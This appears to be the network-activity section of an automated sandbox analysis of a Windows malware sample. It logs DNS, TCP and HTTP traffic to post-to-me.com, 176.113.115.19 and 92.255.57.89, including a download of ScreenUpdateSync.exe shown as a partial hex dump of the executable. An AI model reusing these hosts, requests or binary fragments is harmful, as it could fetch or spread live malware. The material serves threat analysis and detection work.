                                                  Dec 10, 2024 18:58:45.316231966 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.316262007 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.316320896 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.319284916 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.319370031 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.319406986 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.319516897 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.322247982 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.322386980 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.322459936 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.322459936 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.325287104 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.325373888 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.325381041 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.325412035 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.327991009 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.328078985 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.328152895 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.328227997 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.330701113 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.330780983 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.330811977 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.330909967 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.334106922 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.334156036 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.334460020 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.334683895 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.336385965 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.336394072 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.336440086 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.338610888 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.338665962 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.338730097 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.338785887 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.341201067 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.341347933 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.341347933 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.341451883 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.343692064 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.343784094 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.343811989 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.343893051 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.346272945 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.346349001 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.346379995 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.346426964 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.348757029 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.348841906 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.348881006 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.348920107 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.351248026 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.351320028 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.351409912 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.351459980 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.353770971 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.353815079 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.353976965 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.354039907 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.356297016 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.356415987 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.356425047 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.356458902 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.358797073 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.358858109 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.358932018 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.359031916 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.361478090 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.361490011 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.361578941 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.363894939 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.363960028 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.363970995 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.364017010 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.366327047 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.366379976 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.366415977 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.366461992 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.368860006 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.368916988 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.368980885 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.369046926 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.371402979 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.371471882 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.371486902 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.371551991 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.373797894 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.373869896 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.373883009 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.373929977 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.376260042 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.376329899 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.376354933 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.376411915 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.378771067 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.378813982 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.378839970 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.378875017 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.381479979 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.381490946 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.381597042 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.383706093 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.383814096 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.383830070 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.383913040 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.386149883 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.386276960 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.386296034 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.386399984 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.388659000 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.388725996 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.388755083 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.388802052 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.391154051 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.391287088 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.391338110 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.391376972 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.393595934 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.393699884 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.393712044 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.393742085 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.396169901 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.396177053 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.396256924 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.398559093 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.398628950 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.398644924 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.398732901 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.401073933 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.401138067 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.401223898 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.401272058 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.403506041 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.403569937 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.403624058 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.403676033 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.405998945 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.406039953 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.406121969 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.406174898 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.408524036 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.408617020 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.408667088 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.408716917 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.410938978 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.411005020 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.411160946 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.411211014 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.413386106 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.413467884 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.413495064 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.413595915 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.415898085 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.415954113 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.415999889 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.416140079 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.418339014 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.418412924 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.418432951 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.418494940 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.420835018 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.420955896 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.421057940 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.421092033 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.423384905 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.423453093 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.423455954 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.423526049 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.425787926 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.425847054 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.425888062 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.425939083 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.428510904 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.428560019 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.428913116 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.428977966 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.430805922 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.430847883 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.430875063 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.431346893 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.433249950 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.433325052 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.433342934 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.433495998 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.435785055 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.435817957 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.435887098 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.438198090 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.438271046 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.438343048 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.440732002 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.440824986 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.441353083 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.443099022 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.443201065 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.443376064 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.503792048 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.503909111 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.504846096 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.504980087 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.505232096 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.505284071 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.507010937 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.509309053 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:48.927938938 CET4972680192.168.2.892.255.57.89
                                                  Dec 10, 2024 18:58:49.047302961 CET804972692.255.57.89192.168.2.8
                                                  Dec 10, 2024 18:58:49.047420025 CET4972680192.168.2.892.255.57.89
                                                  Dec 10, 2024 18:58:49.047620058 CET4972680192.168.2.892.255.57.89
                                                  Dec 10, 2024 18:58:49.166851997 CET804972692.255.57.89192.168.2.8
                                                  Dec 10, 2024 18:58:49.167007923 CET804972692.255.57.89192.168.2.8
                                                  Dec 10, 2024 18:58:49.789520979 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:49.791280985 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 19:00:30.758436918 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 19:00:31.070981026 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 19:00:31.695966959 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 19:00:32.933413029 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 19:00:35.385437012 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 19:00:40.289489031 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 19:00:50.086327076 CET4972580192.168.2.8176.113.115.19

                                                  UDP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Dec 10, 2024 18:58:40.765010118 CET5873653192.168.2.81.1.1.1
                                                  Dec 10, 2024 18:58:40.991660118 CET53587361.1.1.1192.168.2.8

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Dec 10, 2024 18:58:40.765010118 CET192.168.2.81.1.1.10x87fStandard query (0)post-to-me.comA (IP address)IN (0x0001)false

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Dec 10, 2024 18:58:40.991660118 CET1.1.1.1192.168.2.80x87fNo error (0)post-to-me.com172.67.179.207A (IP address)IN (0x0001)false
                                                  Dec 10, 2024 18:58:40.991660118 CET1.1.1.1192.168.2.80x87fNo error (0)post-to-me.com104.21.56.70A (IP address)IN (0x0001)false

                                                  HTTP Request Dependency Graph

                                                  • post-to-me.com
                                                  • 176.113.115.19
                                                  • 92.255.57.89

                                                  HTTP Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.849725176.113.115.19801736C:\Users\user\Desktop\ssB9bjDQPf.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 10, 2024 18:58:43.210449934 CET85OUTGET /ScreenUpdateSync.exe HTTP/1.1
                                                  User-Agent: ShareScreen
                                                  Host: 176.113.115.19
                                                  Dec 10, 2024 18:58:44.540997028 CET1236INHTTP/1.1 200 OK
                                                  Date: Tue, 10 Dec 2024 17:58:44 GMT
                                                  Server: Apache/2.4.41 (Ubuntu)
                                                  Last-Modified: Tue, 10 Dec 2024 17:45:01 GMT
                                                  ETag: "4a600-628ee0a60051e"
                                                  Accept-Ranges: bytes
                                                  Content-Length: 304640
                                                  Content-Type: application/x-msdos-program
                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 59 67 15 b8 1d 06 7b eb 1d 06 7b eb 1d 06 7b eb 03 54 ff eb 01 06 7b eb 03 54 ee eb 09 06 7b eb 03 54 f8 eb 45 06 7b eb 3a c0 00 eb 1a 06 7b eb 1d 06 7a eb 74 06 7b eb 03 54 f1 eb 1c 06 7b eb 03 54 ef eb 1c 06 7b eb 03 54 ea eb 1c 06 7b eb 52 69 63 68 1d 06 7b eb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 fa 6d 43 66 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 f0 02 00 00 24 3f 00 00 00 00 00 f7 14 00 00 00 10 00 00 00 00 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 20 42 00 00 04 00 00 fe 4e 05 00 02 00 00 80 00 00 [TRUNCATED]
                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$Yg{{{T{T{TE{:{zt{T{T{T{Rich{PELmCf$?@ BND<@"`.text `.rdata\ "@@.data=0l@.rsrc"@$@@
                                                  Dec 10, 2024 18:58:44.541011095 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 25 1c 00 43 00 3b 0d 04 30 43 00 75 02 f3 c3 e9 ec 04 00 00 6a 0c 68 90 15 43 00 e8 df 12 00 00 8b 75 08 85 f6 74 75 83 3d
                                                  Data Ascii: %C;0CujhCutu=uCjYeVYEtVPYYE}u7ujYVj5ZCCuCPmYUQeVEPuu/u9Et
                                                  Dec 10, 2024 18:58:44.541018963 CET448INData Raw: 4d dc 50 51 e8 f9 20 00 00 59 59 c3 8b 65 e8 8b 45 dc 89 45 e0 83 7d e4 00 75 06 50 e8 f3 13 00 00 e8 13 14 00 00 c7 45 fc fe ff ff ff 8b 45 e0 eb 13 33 c0 40 c3 8b 65 e8 c7 45 fc fe ff ff ff b8 ff 00 00 00 e8 4f 0e 00 00 c3 e8 7b 29 00 00 e9 78
                                                  Data Ascii: MPQ YYeEE}uPEE3@eEO{)xU(xXCtXCpXClXC5hXC=dXCfXCfXCf`XCf\XCf%XXCf-TXCXCE|XCEXCEXCWCXC|WCpWCt
                                                  Dec 10, 2024 18:58:44.541322947 CET1236INData Raw: 00 10 00 00 50 ff 15 b8 00 43 00 a3 94 5a 43 00 85 c0 75 02 5d c3 33 c0 40 a3 d0 90 80 00 5d c3 8b ff 56 57 33 f6 bf 98 5a 43 00 83 3c f5 8c 31 43 00 01 75 1e 8d 04 f5 88 31 43 00 89 38 68 a0 0f 00 00 ff 30 83 c7 18 e8 c8 29 00 00 59 59 85 c0 74
                                                  Data Ascii: PCZCu]3@]VW3ZC<1Cu1C8h0)YYtF$|3@_^$1C3SCV1CW>t~tWW&Y2C|1C_t~uP2C|^[UE41CC]jhC3G}39ZC
                                                  Dec 10, 2024 18:58:44.541547060 CET224INData Raw: ec 51 8d 48 14 51 50 e8 a4 25 00 00 8b 45 08 83 c4 0c ff 0d b8 90 80 00 3b 05 e8 5b 43 00 76 04 83 6d 08 14 a1 bc 90 80 00 a3 c4 90 80 00 8b 45 08 a3 e8 5b 43 00 89 3d cc 90 80 00 5b 5f 5e c9 c3 a1 c8 90 80 00 56 8b 35 b8 90 80 00 57 33 ff 3b f0
                                                  Data Ascii: QHQP%E;[CvmE[C=[_^V5W3;u4kP5W5ZCC;u3x5k5hAj5ZCCF;tjh hWCF;uvW5ZCCN>~
                                                  Dec 10, 2024 18:58:44.541552067 CET1236INData Raw: ff 05 b8 90 80 00 8b 46 10 83 08 ff 8b c6 5f 5e c3 8b ff 55 8b ec 51 51 8b 4d 08 8b 41 08 53 56 8b 71 10 57 33 db eb 03 03 c0 43 85 c0 7d f9 8b c3 69 c0 04 02 00 00 8d 84 30 44 01 00 00 6a 3f 89 45 f8 5a 89 40 08 89 40 04 83 c0 08 4a 75 f4 6a 04
                                                  Data Ascii: F_^UQQMASVqW3C}i0Dj?EZ@@JujhyhWCupU;wC+GAH@PIuUEOHAJHAdD3GFC
                                                  Dec 10, 2024 18:58:44.541563988 CET1236INData Raw: fb ff ff 59 8b 4b 10 89 01 8b 43 10 83 38 ff 74 e5 89 1d c4 90 80 00 8b 43 10 8b 10 89 55 fc 83 fa ff 74 14 8b 8c 90 c4 00 00 00 8b 7c 90 44 23 4d f8 23 fe 0b cf 75 29 83 65 fc 00 8b 90 c4 00 00 00 8d 48 44 8b 39 23 55 f8 23 fe 0b d7 75 0e ff 45
                                                  Data Ascii: YKC8tCUt|D#M#u)eHD9#U#uEUiDMLD3#u#Mj _G}MT+MN?M~j?^;J;Ju\ }&M|8]#\D\Du3M]!,O
                                                  Dec 10, 2024 18:58:44.541569948 CET1236INData Raw: 85 72 ff ff ff 8b 45 10 3b c7 0f 84 50 ff ff ff c7 00 0c 00 00 00 e9 45 ff ff ff 33 ff 8b 75 0c 6a 04 e8 3f f1 ff ff 59 c3 3b df 75 0d 8b 45 10 3b c7 74 06 c7 00 0c 00 00 00 8b c3 e8 3c fd ff ff c3 8b ff 55 8b ec 57 bf e8 03 00 00 57 ff 15 d4 00
                                                  Data Ascii: rE;PE3uj?Y;uE;t<UWWCu,C`wt_]Uu52Ch]UhC,CthCPXCtu]UuYuCj[YjxYU
                                                  Dec 10, 2024 18:58:44.541575909 CET1236INData Raw: 00 00 83 c4 14 68 10 20 01 00 68 28 07 43 00 57 e8 64 1f 00 00 83 c4 0c eb 32 6a f4 ff 15 e0 00 43 00 8b d8 3b de 74 24 83 fb ff 74 1f 6a 00 8d 45 f8 50 8d 34 fd b4 32 43 00 ff 36 e8 d3 21 00 00 59 50 ff 36 53 ff 15 dc 00 43 00 5f 5e 5b c9 c3 6a
                                                  Data Ascii: h h(CWd2jC;t$tjEP42C6!YP6SC_^[j"Ytj"Yu=0Cuh)hYYUE4_C]U54_CYtuYt3@]3]UV5l3C5Ct!h3CtP5l3Ct
                                                  Dec 10, 2024 18:58:44.542485952 CET1236INData Raw: 57 be 9c 07 43 00 56 ff 15 2c 00 43 00 85 c0 75 07 56 e8 83 f6 ff ff 59 8b f8 85 ff 0f 84 5e 01 00 00 8b 35 58 00 43 00 68 e8 07 43 00 57 ff d6 68 dc 07 43 00 57 a3 3c 5f 43 00 ff d6 68 d0 07 43 00 57 a3 40 5f 43 00 ff d6 68 c8 07 43 00 57 a3 44
                                                  Data Ascii: WCV,CuVY^5XChCWhCW<_ChCW@_ChCWD_C=<_C5CH_Ct=@_Ct=D_Ctu$C@_CC<_CJ,@5D_CH_CCl3C5@_CP5<_C5@_C<_C5D_C@_
                                                  Dec 10, 2024 18:58:44.660711050 CET1236INData Raw: eb 1b f7 c1 03 01 00 00 74 31 8a cb 80 e9 61 80 f9 19 0f be cb 77 03 83 e9 20 83 c1 c9 3b 4d 14 73 19 83 4d 18 08 39 45 fc 72 27 75 04 3b ca 76 21 83 4d 18 04 83 7d 10 00 75 23 8b 45 18 4f a8 08 75 20 83 7d 10 00 74 03 8b 7d 0c 83 65 fc 00 eb 5b
                                                  Data Ascii: t1aw ;MsM9Er'u;v!M}u#EOu }t}e[]]]Guu=t}wu+9uv&yE"tMEjXEEt8Et]}tE`pEEt0}tE`p3[_^U


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  1192.168.2.84972692.255.57.89801280C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 10, 2024 18:58:49.047620058 CET87OUTGET / HTTP/1.1
                                                  Host: 92.255.57.89
                                                  Connection: Keep-Alive
                                                  Cache-Control: no-cache


                                                  HTTPS Proxied Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.849724172.67.179.2074431736C:\Users\user\Desktop\ssB9bjDQPf.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-10 17:58:42 UTC90OUTGET /track_prt.php?sub=0&cc=DE HTTP/1.1
                                                  User-Agent: ShareScreen
                                                  Host: post-to-me.com
                                                  2024-12-10 17:58:42 UTC798INHTTP/1.1 200 OK
                                                  Date: Tue, 10 Dec 2024 17:58:42 GMT
